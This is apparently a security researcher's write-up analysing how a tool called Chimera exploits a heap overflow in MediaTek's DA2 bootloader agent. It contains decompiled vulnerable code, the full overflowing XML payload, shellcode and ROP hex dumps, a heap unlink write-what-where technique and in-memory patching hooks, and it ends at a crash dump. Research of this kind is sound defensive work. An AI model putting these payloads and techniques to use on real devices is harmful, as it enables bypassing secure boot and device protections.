Unsupported command.m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].
m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].

Going back to the USB capture, the interesting stuff only started happening once DA2 was fully loaded.

At first glance, we noticed that the very first thing Chimera did was issue two CMD:SECURITY-SET-ALLINONE-SIGNATURE commands, but one of them looked slightly off.

A quick look at the capture revealed the following sequence:

Send CMD:SECURITY-SET-ALLINONE-SIGNATURE with a normal filename
Send the AIO file data (which looks like ARM64 code, not a real signature)
Send another CMD:SECURITY-SET-ALLINONE-SIGNATURE with an absurdly long filename full of special characters
Send a second AIO file
Intentionally trigger an error by not sending the expected ACK

This was clearly deliberate. But why send two AIO commands? And what's with the weird filename?

The AIO command

To understand what's going on, we analyzed what CMD:SECURITY-SET-ALLINONE-SIGNATURE is supposed to do:

int cmd_security_set_all_in_one_signature(com_channel_struct *channel,char *xml)
{
  int status;
  mxml_node_t *tree;
  char *file_name;
  uint32_t all_in_one_sig_sz;
  uint8_t *all_in_one_sig;
  
  tree = mxmlLoadString((mxml_node_t *)0x0,xml,MXML_OPAQUE_CALLBACK);
  if (tree == (mxml_node_t *)0x0) {
    status = -0x3ffeffff;
    set_error_msg("Required XML node path not found. Check command string.");
  }
  else {
    file_name = mxmlGetNodeText(tree,"da/arg/source_file");
    if (file_name == (char *)0x0) {
      status = -0x3ffeffff;
      set_error_msg("Required XML node path not found. Check command string.");
    }
    else {
      all_in_one_sig = (uint8_t *)0x0;
      all_in_one_sig_sz = 0;
      status = fp_read_host_file(channel,file_name,&all_in_one_sig,&all_in_one_sig_sz, "Signature");
      if (status < 0) {
        free(all_in_one_sig);
      }
      else {
        set_all_in_one_signature_buffer(all_in_one_sig,all_in_one_sig_sz);
      }
    }
    mxmlDelete(tree);
  }
  return status;
}

The command first parses the XML using mxmlLoadString (which allocates memory for the parsed tree), then extracts the source_file argument and calls fp_read_host_file to download that file from the host.

Looking at fp_read_host_file, we can see it allocates a buffer for the incoming data if the passed pointer is null:

int fp_read_host_file(com_channel_struct *channel, char *file_name, char **ppdata,
                      uint32_t *pdata_len, char *info)
{
  // ... escape filename and send download request to host ...
  
  // read total length from host
  bytes_read = (*channel->read)(buf_total_length, &length);
  if (bytes_read == 0) {
    // ... parse response ...
    total_length = atoll(vec[1]);
    total_len = (uint)total_length;
    
    if ((*ppdata == (char *)0x0) || (*pdata_len == 0)) {
      // allocate buffer for file data
      *pdata_len = total_len;
      error_msg = (char *)malloc(total_length + 4 & 0xffffffff);
      *ppdata = error_msg;
      if (error_msg != (char *)0x0) goto consume_data;
      // ...
    }
    
consume_data:
    (*channel->write)((uint8_t *)"OK", 3);
    // ... read file data into buffer ...
  }
  // ...
}

Back in cmd_security_set_all_in_one_signature, if fp_read_host_file returns an error, the allocated buffer gets freed.

Otherwise, set_all_in_one_signature_buffer stores it in a global variable. Either way, mxmlDelete(tree) cleans up the XML tree at the end.

In normal usage, this command provides the DA with an "all-in-one" signature file containing cryptographic signatures for every partition on the device, allowing the DA to verify images during flashing without needing separate signature files for each partition.

The first CMD:SECURITY-SET-ALLINONE-SIGNATURE Chimera sends looks perfectly normal, except the file content doesn't look like a valid AIO signature at all:

00000000  fd 7b be a9 f3 0b 00 f9  fd 03 00 91 b3 02 00 f0  |.{..............|
00000010  73 02 1b 91 e0 03 13 aa  f5 35 00 94 e0 03 13 aa  |s........5......|
00000020  f3 0b 40 f9 fd 7b c2 a8  c0 03 5f d6 e0 03 13 aa  |..@..{...._.....|
00000030  e8 03 00 aa e8 03 00 f0  08 e9 43 b9 08 41 00 51  |..........C..A.Q|
... more lines omitted for brevity ...

The astute reader will notice this looks suspiciously like ARM64 instructions. The first four bytes fd 7b be a9 correspond to the typical function prologue stp x29, x30, [sp, #-0x20]!.

The second AIO file was equally strange: a bunch of what looked like pointers, possibly a ROP chain?

00000000  cc 24 06 40 00 00 00 00  cc 24 06 40 00 00 00 00  |.$.@.....$.@....|
00000010  34 ec 03 40 00 00 00 00  f4 f7 02 40 00 00 00 00  |4..@.......@....|
00000020  00 ac 05 40 00 00 00 00  9c a7 00 40 00 00 00 00  |...@.......@....|
00000030  f0 f1 01 40 00 00 00 00  3c e8 02 40 00 00 00 00  |...@....<..@....|
... more lines omitted for brevity ...

Little did we know, most of both files were just padding or junk data that Chimera added to confuse analysis. More on that later.

At this point, we weren't sure what any of this meant. But the weird filename in the second command was the more obvious lead.

For the second command, Chimera sent an absurdly long filename full of special characters:

<?xml version="1.0" encoding="UTF-8"?><da><version>1.0</version><command>CMD:SECURITY-SET-ALLINONE-SIGNATURE</command><arg><source_file>
;;;;;;;;;;;;;;;;&gt;;;;;&gt;;;;;;;;&amp;;;;;&quot;;;;;;;;;;&gt;;&quot;;;;;;;;;;;;;&amp;;&amp;;;;;;;;;;;;;;;&lt;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&amp;;;&gt;&lt;;&quot;;&amp;;;;;;;&gt;;;;;;;;;;;&quot;;&amp;;;;;;;;;&amp;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;&amp;;;&lt;;;&lt;;;;;;&amp;&lt;;;;;;;;;;;;&lt;;;;;&gt;;;;;;;;;;;;;;;;;;&lt;;;;;;&quot;;;;;;;;;;;&amp;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;&quot;&quot;;;;;&quot;;;;;;;&quot;;;;;;;;;;;&gt;&gt;;;;;;&quot;;;;;;;;&quot;;&amp;;;;;;;;;;;;&gt;;&quot;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;&gt;;;;;;;;;;&quot;;&gt;;;;;;&quot;;&gt;;;;;;;;;;&quot;;&amp;;;;&quot;;;&gt;&lt;;;;;;;;;;&lt;;;;;;;;&gt;;;;;;;;;;;&quot;;;;;;;;&gt;;;;;;;;;;;&amp;&gt;&quot;;&quot;;;;;;;;;;;;;&quot;;;&lt;;;;;;;;&amp;&gt;;;;;;;&amp;;;;;;;;&amp;;;;&lt;;;;&lt;;;&amp;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&amp;;&amp;;;;;;;;;;;;;;;&amp;;;&lt;;;;;;;;;;;;&quot;&gt;;;;;&quot;;;;;;;&quot;;&quot;;;;;&lt;;&lt;;;;;;;&amp;&gt;;&lt;&quot;;;;;;;&amp;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;&quot;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;&amp;;;&lt;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;&quot;;;;;;;;;;;;;;;;;&lt;;;;;;&lt;&amp;;;;;;&lt;&amp;;&amp;;;;;;;&lt;;;&quot;;;;;&gt;;;;&quot;;;;;&amp;;;&amp;;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;;&amp;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;&amp;&gt;;;&gt;&lt;;;;;;;;;;;;;&lt;;;&amp;;;;;;;;;;;;&lt;;;&lt;;;&quot;;;;;;;&quot;;;;;;;;;;;;&amp;;;;&amp;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;&quot;;;&lt;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;&lt;&quot;;;;;;;&gt;;;;;;;&amp;;;&amp;;;;;;;&lt;;;;;;;;;;;;&lt;;;;;;;;;;&lt;;&gt;;;;;;;;&gt;;;;;;;&lt;;;;;;&quot;;;;;&gt;&lt;;;;;;;;;;;;&amp;;;;;;;;;&lt;;;;;;;;;&quot;;;;;;&amp;;;;;&amp;&quot;;&amp;;;;;;;;;&gt;;;;;&gt;&lt;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;&gt;;;&lt;;;&gt;;;;;&amp;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;&gt;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&gt;;&amp;;;;;;;;;;;;;;;&gt;;;;;;;&gt;;;;;;;;&amp;;&quot;;;;;;;;;;;;;;;;;;;;;;&quot;;&gt;;;&gt;;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;&amp;;;&quot;;;;;&gt;;;;;;;;;;;;&amp;;;&quot;&gt;;;;;;;;;;;;;;&lt;;;;;&amp;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;&gt;;&lt;;;;&lt;;;;;;;;;&lt;;;;;&quot;;&lt;&quot;;;;;;;;;;;;;&lt;;;;;&gt;;;;;;&amp;;;;;;;;;;;;;;;;&gt;;;;;;;&quot;;;;;;;;&quot;;;&quot;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;&lt;&gt;;;;;;;;;;;;;;&amp;;;;;;;&gt;;&amp;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&lt;;;;;;;;;;;&lt;;;;&quot;;;&lt;;;;;;;;;;;;;;;;&quot;&lt;;;;;;;;&gt;;;;;&lt;;;;;;;;;;;;;&gt;;;;&quot;;;&gt;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;&amp;;;;;&quot;;;;;;;&amp;&quot;;;;&quot;;;;;;;&quot;;&lt;;&lt;;&gt;;;;;;;;;;&amp;;;;;&amp;;;&lt;&lt;&gt;&amp;;&gt;;;&lt;;;;;;;;;;;&quot;;&lt;;;;;&amp;;;;;;;;;;&amp;;;&lt;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;&quot;;;;&amp;&lt;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;&lt;;;;;;&amp;;;;;;;;;&gt;;;&quot;;;;;;;;;;;;;;;;;&amp;;;;;;;&lt;;;;;;;;;&lt;;&gt;&quot;;;;;&amp;&amp;;;;;;;;;;&amp;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&amp;;;&lt;;;&quot;;;;;&gt;;;&quot;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;&gt;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;&amp;;;;;;;;;;;;;;&quot;;;;;;;;&gt;;;;;;;;;;;;;;&gt;;;;;;;&gt;&quot;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;&quot;;;;;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;;;;;;&gt;&lt;;;;;;;;;;&amp;;;;;;;;&quot;;;;;;;&lt;;;;;;;;;&gt;;;;;;;;;;;;;;;&lt;;;;;;;;&lt;;;;;;;;;;;;&amp;;;&amp;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;&quot;;;&quot;;&gt;;&amp;;;;&quot;;;;;;;&lt;;;;;;;&quot;;;;;;;;;;;;;;&quot;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;&gt;;;&quot;;&quot;;;;;;;;;;&gt;;&quot;;;&quot;&quot;&lt;;;;&gt;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;&gt;;;;;;;;;;;;;;;;;&lt;;&quot;;;&gt;;;;;;;;;&amp;;;;;;;;;;;;;&amp;;;;;;;;;;&amp;;;;;;;;;;&quot;;&lt;;;;;;;;;;;&gt;;;;;;&lt;;;;;;&amp;;;;;;&gt;;;;;&amp;;;;;;&amp;;;&quot;;;;;;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;&gt;&lt;;;;;&gt;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;&lt;&amp;;;;;;;&amp;;;;;;;;;;;;;&gt;;;;;;&amp;;;;;;;;;&gt;;;;&amp;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;&gt;&quot;;;;;&amp;;;;;&amp;&quot;&quot;;;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;&lt;&amp;;;;;;;&lt;;;;;;;;;;&lt;;;;;;;;;;&amp;;;;;;;;;&quot;&gt;;;;;;;;;;;&lt;&quot;;;;;;&lt;;;;;;;;;;;;&quot;&amp;;;&quot;&lt;;&quot;;&quot;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;&quot;;;;&amp;;;;&lt;;&quot;;;;;;;;;;;&lt;;;;&quot;;;;;;;;;;;;;;;&lt;&lt;&lt;;;;;;;&lt;;&quot;;;&amp;;;;;;;;&quot;&amp;;;&amp;;;;;;;&amp;;;&gt;;&quot;;;;;;;;;;;;;&quot;;;;;;;;&lt;;;;;;;;;;&lt;;;;;;;;;;&amp;;;&quot;&quot;;;;;;;;;;;;;;;;;;;;;&quot;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&quot;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;;;;&lt;;;;;&quot;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&amp;&quot;&amp;;&amp;;;;;;;;;;;;;;&quot;;;;;;;;;;;;&gt;;;;;;;;;;&quot;;&amp;;&gt;;&gt;;;;;&amp;;;;&lt;;;;;;;;;;&amp;;;;;;;&amp;;;;;;;;;;;;;;;;;&quot;&quot;;;;;;;;;&gt;;&lt;;;;;;;;;;;;&quot;;;&gt;&amp;;&lt;;;;;;&lt;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;&amp;;;&amp;;;;;;;&gt;;;&lt;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;&quot;;;&amp;&amp;;&amp;;;;;;;&amp;;&gt;;&quot;;;;;;;;;;;;;;&amp;;;;;;&lt;;;;;;;;;&gt;;;&lt;;;;;;;;;;;;;;;;;&quot;;;;;;;;;&amp;;;;;;;;;;;&quot;;;;;;&quot;;;;;;&gt;;;;;&amp;;;;;;;;;;;;&amp;;&amp;;;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;&lt;;;;;;;;&gt;;;;;;&quot;;;;&quot;;;;;;;&quot;;;;;;;;;;;;;;&lt;;;&amp;&amp;&gt;;;;;;;&amp;;;;;;;;&quot;;;;;;;;;&gt;;;;;;;;;&quot;;&lt;;&amp;;;;&amp;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;&quot;;;;&quot;;;;;;;&gt;;&amp;;;;;&gt;&lt;;;;;&gt;;;;&amp;;;&quot;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;;;;;;;;&amp;;;;;&gt;;;&amp;;&gt;;&gt;;;;&quot;;;;&amp;;;;;;;&quot;;;;;;;;;;&gt;;&gt;;&quot;;;;;;;;;;;;;;&amp;;;;;;&gt;&quot;;;;;;;;;;;&lt;;;;;&quot;;;;;;;&gt;;;;;;;;;&lt;;;;;;;;;;;;;;&gt;;;;&gt;;;;;;;;;;&amp;;;;;&lt;;;;&quot;;;;;;;&gt;;;;;;&lt;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;&lt;;;;;;;&quot;&quot;;;;;;;;;&gt;;;;;;&gt;;&gt;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;&gt;;;&amp;&amp;;;&gt;&lt;;;;
</source_file></arg></da>

This quickly caught our attention, so we decided to check what the DA was doing with the name.

XML Expansion

Like we mentioned before, the AIO command invokes fp_read_host_file to download the specified file from the host. But before initiating the transfer, the function calls mxml_escape on the filename to sanitize it for XML:

filename_len = strnlen(file_name, 0x200);
escaped_xml = mxml_escape(file_name, (uint32_t)filename_len);
bytes_read = snprintf((char *)(result + 0x40), XML_CMD_BUFF_LEN,
    "<?xml version=\"1.0\" encoding=\"utf-8\"?><host>..."
    "<source_file>%s</source_file>...</host>",
    error_msg, buf, escaped_xml, (ulong)package_Len);

The problem is in mxml_escape. It allocates a fixed 512-byte buffer (0x200) and expands special XML characters without any bounds checking:

char *mxml_escape(char *src, uint32_t len)
{
  byte bVar1;
  char *pcVar2;
  byte *dest;
  byte *pbVar3;
  ulong uVar4;

  if ((_dest == (byte *)0x0) &&
      (_dest = (byte *)malloc(0x200), _dest == (byte *)0x0)) {
    return "";
  }
  pcVar2 = (char *)_dest;
  memset(_dest, 0, 0x200);
  if (src == (char *)0x0) {
    pcVar2 = "null";
  } else {
    pbVar3 = (byte *)pcVar2;
    if (len != 0) {
      uVar4 = (ulong)len;
      dest = (byte *)pcVar2;
      do {
        bVar1 = *src;
        if (bVar1 == 0x22) {
          memcpy(dest, "&quot;", 6);  // " -> 6 bytes
          pbVar3 = dest + 6;
        } else if (bVar1 == 0x26) {
          memcpy(dest, "&amp;", 5);   // & -> 5 bytes
          pbVar3 = dest + 5;
        } else if (bVar1 == '<') {
          // < -> 4 bytes (&lt;)
          pbVar3 = dest + 4;
        } else if (bVar1 == '>') {
          // > -> 4 bytes (&gt;)
          pbVar3 = dest + 4;
        } else {
          *dest = bVar1;
          pbVar3 = dest + 1;
        }
        src = (char *)((byte *)src + 1);
        uVar4 = uVar4 - 1;
        dest = pbVar3;
      } while (uVar4 != 0);
    }
    *pbVar3 = 0;
  }
  return (char *)(byte *)pcVar2;
}

Character	Expansion	Size
`"`	`"`	6 bytes
`&`	`&`	5 bytes
`<`	`<`	4 bytes
`>`	`>`	4 bytes

So if you send a filename containing 103 & characters, mxml_escape tries to write 103 * 5 = 515 bytes into a 512-byte buffer. Classic heap overflow.

The second AIO command Chimera sends uses exactly this technique: a filename stuffed with & characters.

We wrote a quick Python script to simulate the expansion and figure out how much they were overwriting:

Input size:    0x17ca (6090 bytes)
Capped size:   0x200 (512 bytes, capped by strnlen)
Expanded size: 0x2ac (684 bytes)
Buffer size:   0x200 (512 bytes)
Overflow:      0xac (172 bytes)

Special characters (in first 0x200 bytes):
  '&': 43 occurrences (215 bytes expanded)

Update (02/02/2026): Corrected overflow size, strnlen caps the filename to 512 bytes before expansion, so the actual overflow is 172 bytes, not 7.5KB.

That's a modest overflow, 172 bytes past the end of the buffer. The ~6KB filename Chimera sends is mostly theater, only the first 512 bytes matter, and most of that is just ; characters that don't expand at all.

But.. how is this exactly useful? What is this exactly overwriting?

Understanding the Heap

To understand how to exploit this overflow, we first need to understand how the heap works in both DAs.

MediaTek uses a simple heap implementation based on LK's (Little Kernel) miniheap.

Depending on the architecture, the DA uses slightly different implementations: miniheap.c for ARM64 and heap.c for ARM32. The core logic is mostly the same, but there are some differences in the metadata structures.

Initialization

One of the very first things DA2 does after booting is initialize its heap:

void init_heap(void)
{
    heap_init(0x4007f100, 0x32000000);
}

The heap_init function sets up a global structure called theheap that tracks the heap state:

struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    size_t remaining;           // bytes still available
    size_t low_watermark;       // lowest remaining value seen
    mutex_t lock;               // mutex for thread safety
    struct list_node free_list; // head of free chunk list
};

struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    struct list_node free_list; // head of free chunk list
};

This structure lives in DA2's .bss section, not on the heap itself. It holds references to where the heap starts, its size, and the head of the free list.

In this case, the heap starts at 0x4007F100 with a size of 0x32000000 (800MB). The base address varies between devices, but the size has remained the same across all DAs we've analyzed.

Heap Layout

The heap is divided into chunks laid out sequentially in memory. Each chunk can be either allocated or free, and they can appear in any order depending on the history of allocations and frees.

Something like ALLOC -> ALLOC -> FREE -> ALLOC is perfectly valid.

Each chunk starts with a header, followed by the body (user data when allocated, unused space when free). The header format differs between chunk types.

Free Chunks

Free chunks are linked together in a doubly-linked list so the allocator can quickly find available memory. The list is sorted by address, with lower addresses appearing first:

struct free_heap_chunk {
    struct list_node node;  // prev/next pointers (embedded struct)
    size_t len;             // total size of this chunk
};

The list_node struct is embedded as the first member:

struct list_node {
    struct list_node *prev;
    struct list_node *next;
};

Since list_node sits at offset 0, you can cast between free_heap_chunk* and list_node* freely.

Allocated Chunks

Allocated chunks are not linked together. They simply sit in memory with a header placed immediately before the user data:

struct alloc_struct_begin {
    unsigned int magic;  // 0x68656170 ('heap') / ONLY on ARM32
    void *ptr;           // pointer to the start of the chunk (header included)
    size_t size;         // total size of the chunk (header + user data)
};

The ptr field points back to where the chunk actually starts in memory. This is needed because alignment requirements might add padding between the header and user data, so when freeing, the allocator needs to know where the chunk originally began.

The most notable difference between architectures is that ARM32 allocations include a magic field set to 0x68656170 ('heap'), while ARM64 does not (it's only included when LK_DEBUGLEVEL > 1, which we've never seen enabled in production DAs).

Allocation

When you call malloc(size), the heap:

Adds sizeof(struct alloc_struct_begin) to the requested size
Rounds up to pointer alignment
Walks the free list from the head and uses the first chunk that fits (first-fit allocation)
If the chunk is larger than needed, splits it: one part becomes allocated, the remainder stays free
Stores the allocation metadata just before the returned pointer

Since the free list is sorted by address, lower addresses tend to get allocated first, though this depends on the current fragmentation state.

Free

When you call free(ptr), the heap:

Reads the alloc_struct_begin metadata before the pointer
Creates a new free chunk from the allocation
Inserts it back into the free list (sorted by address), merging with adjacent free chunks if possible

Exploiting the Free List

This same allocator has been the target of previous research. Quarkslab's "When Samsung meets MediaTek" paper exploited a heap overflow in Samsung's bootloader by abusing the free list unlink operation, so we decided to look at the same primitive.

When a chunk is removed from the free list during allocation, list_delete performs a classic unlink:

static inline void list_delete(struct list_node *item)
{
    item->next->prev = item->prev;
    item->prev->next = item->next;
    item->prev = item->next = 0;
}

If we can overflow into a free chunk and corrupt its prev/next pointers, we get a write-what-where primitive when that chunk gets unlinked. It's a classic technique, but still effective when there's no heap hardening.

Debugging the Heap

At this point, we understood the heap internals and had a potential overflow primitive. But to actually exploit it, we needed to know the exact heap state when the overflow happens: what's allocated, what's free, and where everything sits in memory.

The Quarkslab researchers faced a similar challenge and solved it by dumping the heap and emulating it offline. We wanted to do the same, but there was a problem: we had no easy way to read memory from the device.

On older devices, you could use Carbonara to get arbitrary read/write in DA1. But our target's DA1 was already patched against Carbonara, so that wasn't an option.

A Crazy Idea

Then I remembered a project I'd released the previous year: fenrir. To understand what it does, you need to know how MediaTek's boot chain works:

The LK partition actually contains an image with multiple sub-partitions inside:

----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------

The important thing is that Preloader loads and jumps to bl2_ext while still running at EL3 (the highest ARM privilege level), expecting it to drop privileges and continue the boot chain. From there, bl2_ext verifies and loads everything that comes after it.

fenrir exploits a logic flaw where this sub-partition isn't properly verified when seccfg is unlocked. By patching the original to skip verification of subsequent partitions, you can boot unsigned or patched LK sub-partitions:

[PART] img_auth_required = 0
[PART] Image with header, name: bl2_ext, addr: FFFFFFFFh, mode: FFFFFFFFh, size:654944, magic:58881688h
[PART] part: lk_a img: bl2_ext cert vfy(0 ms)

But for this research, we needed something more powerful. We didn't just want to skip verification, we wanted to patch Preloader's memory directly and re-execute certain routines, like the handshake handler.

So I wrote sprig, a complete replacement for bl2_ext. Instead of patching the original, this payload takes its place entirely.

Preloader loads it expecting the real thing, but instead of continuing the boot chain, it runs at EL3 in the same context as Preloader itself.

The initial version was simple: disable SBC, SLA, and DAA checks, then jump back to Preloader's handshake handler.

This let us load unmodified DAs through penumbra, upload a test file using the AIO command, and then dump the heap to see exactly where our data ended up.

With the heap dumped, the next step was to find where the AIO signature data landed and start mapping out the heap layout.

I fired up a hex editor and searched for AAAAAAAAAAAAAAAA..., which is what our test payload consisted of.

...and there it was! By analyzing the header, we can see this chunk is allocated (size = 0x200018) and sits at 0x40308BF8.

Since size matters, we repeated the upload with whatever Chimera sends as the first AIO signature. This time it landed at 0x40308C18 with a size of 0x1E0230 bytes.

Dynamic Heap Analysis

Now we knew where our data landed, but we needed more: what's around it, how the heap evolves during the exploit, and ideally, real-time dumps as things happen.

Since we had no control over what Chimera sends, we needed to be there before Chimera feeds the device with its DAs and commands.

Extending sprig

Everything flows through Preloader first. DA1 gets downloaded and verified by Preloader, then DA1 downloads and verifies DA2. If we could hook each stage as it loads, we could patch anything we wanted.

So I extended sprig to install hooks at multiple points in the boot chain:

Preloader hook: Right after Preloader receives and verifies DA1, but before jumping to it. This lets us patch DA1 in memory.
DA1 hook: Right after DA1 receives and verifies DA2, but before jumping to it. This lets us patch DA2 in memory.

For DA1, the first thing I did was force the log level to DEBUG regardless of what the host requests:

static void da1_init_hook(void) {
    printf("DA1 init hook\n");

    /* force log level to DEBUG */
    writel(0x52800028, 0x40200EC4);
    flush_dcache_range(0x40200EC4, 4);
    invalidate_icache();

    hook_install(&(hook_t)HOOK(0x40200B50, 0x402010AC, da2_init_hook, "da2_init"));
}

This simple patch meant we'd get full UART output from both DAs, regardless of Chimera trying to silence them with da_log_level=ERROR.

Hooking DA2

Once DA2 loads, the real fun begins. Based on what we'd seen in the USB capture, we knew the exploit involved heap allocations, XML parsing, and some kind of error condition.

So I installed hooks on the functions that seemed most relevant:

static void da2_init_hook(void) {
    printf("DA2 init hook\n");

    hook_install(&(hook_t)HOOK(0x4000749C, 0x400066AC, free_on_abort_hook, "free_on_abort"));
    hook_install(&(hook_t)HOOK(0x4002AAB0, 0x4000687C, malloc_for_file_hook, "malloc_for_file"));
    hook_install(&(hook_t)HOOK(0x4002A9F0, 0x400067BC, error_path_hook, "error_path_1"));
    hook_install(&(hook_t)HOOK(0x4002AA88, 0x400068CC, error_path_hook, "error_path_2"));
    hook_install(&(hook_t)HOOK(0x4000FBE0, 0x4000693C, mxml_free_hook, "mxml_free"));
    hook_install(&(hook_t)HOOK(0x4000fcac, 0x40006E1C, mxml_inner_free_hook, "mxml_inner_free"));
    hook_install(&(hook_t)HOOK(0x4002A554, 0x40006B9C, mxml_escape_malloc_hook, "mxml_escape_malloc"));
    hook_install(&(hook_t)HOOK(0x4002A8F4, 0x40006D6C, mxml_escape_hook, "mxml_escape"));
}

malloc_for_file_hook: Tracks where fp_read_host_file allocates buffers for incoming data
mxml_escape_malloc_hook: Tracks the 0x200-byte buffer allocation in mxml_escape
mxml_escape_hook: Dumps the escaped output to see if/how it overflows
error_path_hook: Catches when fp_read_host_file hits an error
free_on_abort_hook: Monitors what gets freed during error handling
mxml_free_hook: Tracks when the XML tree gets cleaned up
mxml_inner_free_hook: Tracks the individual free() calls inside mxml_free for node data

Each hook logs its arguments, dumps relevant memory regions, and traces the heap state.

Heap Layout

With the previous hooks in place, we ran Chimera again and watched the UART output. The heap layout became clear:

When the second AIO command arrives, Chimera sends it with a huge filename full of special characters. This does two things:

Heap shaping: mxmlLoadString allocates a buffer for the filename string, which ends up right after the AIO2 data buffer due to the allocation size.
XML expansion overflow: When mxml_escape processes the special characters, it expands them (& → &, etc.) and overflows into the AIO1 shellcode buffer.

A Dead End: The XML Overflow

We initially thought the XML expansion was the exploit. After all, it's still a heap overflow, 172 bytes past the end of the buffer.

When the second AIO command arrives, mxml_escape processes the long filename full of special characters.

The expanded output overflows past the 0x200-byte buffer and corrupts the AIO signature buffer 1 that sits right after it.

Remember what happens in set_all_in_one_signature_buffer:

if (_g_ext_all_in_one_sig != (uint8_t *)0x0) {
    free(_g_ext_all_in_one_sig);
}

If a previous AIO signature exists, it gets freed before storing the new one. So when the second AIO command completes successfully, the corrupted AIO buffer 1 gets freed.

We tried to replicate this ourselves: send the first AIO, then send the second AIO with the malicious filename, but without aborting like Chimera does. The result was a crash:

data fault: PC at 0x40009ec4, FAR 0x6d61263b3b3b747c, iss 0x61
ESR 0x96000061: ec 0x25, il 0x2000000, iss 0x61
iframe 0x402836d0:
x0  0x6d61263b3b3b746c x1  0x              3a x2  0x        40075820 x3  0x        40075840
x4  0x        40043d6f x5  0x        400441e7 x6  0x              58 x7  0x              78
x8  0x6d61263b3b3b746c x9  0x3b3b3b3b3b3b3b70 x10 0x             657 x11 0x             654
x12 0x        31bb1508 x13 0x        40070160 x14 0x              68 x15 0x        40282fbf
x16 0xfffffffffffffe02 x17 0x        400441a6 x18 0x               d x19 0x              3a
x20 0x        403084e0 x21 0x        40076000 x22 0x        40070000 x23 0x        40287e40
x24 0x        40070000 x25 0x        40008db8 x26 0x        40055000 x27 0x        40070000
x28 0x               0 x29 0x        402837e0 lr  0x        4002ccbc usp 0x99b04a2404743432
elr 0x        40009ec4
spsr 0x        6200038d
#die sync exception.

Looking at the decompiled DA2, the crash happens in free():

free:
    40009eb8  cbz   ptr, LAB_40009ecc
    40009ebc  ldp   x8, x9, [ptr, #-0x10]   ; load chunk header
    40009ec0  mov   ptr, x8
    40009ec4  str   x9, [x8, #0x10]         ; CRASH HERE

